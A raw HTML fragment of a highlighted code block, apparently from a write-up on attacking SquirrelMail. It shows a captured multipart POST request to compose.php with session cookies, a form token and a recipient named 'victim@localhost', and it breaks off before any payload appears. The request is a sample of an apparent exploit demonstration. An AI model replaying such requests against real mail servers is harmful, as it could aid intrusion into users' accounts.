&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;smaction&#8221;      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;mailbox&#8221;    INBOX  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;composesession&#8221;    4  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;querystring&#8221;    mailbox=None&amp;amp;startMessage=0  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894&#8211;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-86\">86<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">squirrelmail<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">compose<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trusty<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-3\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">squirrelmail_language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">deleted<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SQMSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">udp0a3dbm2oba2710a6amh0kg0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">aT2bDg<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mailviewsplitterv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">226<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prefviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">folderviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">identviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">composesplitterv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">248<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addressviewsplitterd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">226<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addressviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">286<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">roundcube_sessid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">151ubr2mfl36odovf7vkk66v60<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">minimalmode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-4\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">alive<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">multipart<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">boundary<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-6\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2275<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-8\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;smtoken&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-11\"><span class=\"crayon-v\">qseiZ0jvPW8f<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-12\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-13\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;startMessage&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-15\"><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-16\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-17\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;session&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-19\"><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-20\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-21\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;passed_id&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-24\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-25\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;send_to&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-27\"><span class=\"crayon-v\">victim<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">localhost<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-28\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-29\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;send_to_cc&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-32\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-34\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-35\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;send_to_bcc&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-38\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-39\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;subject&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-41\"><span 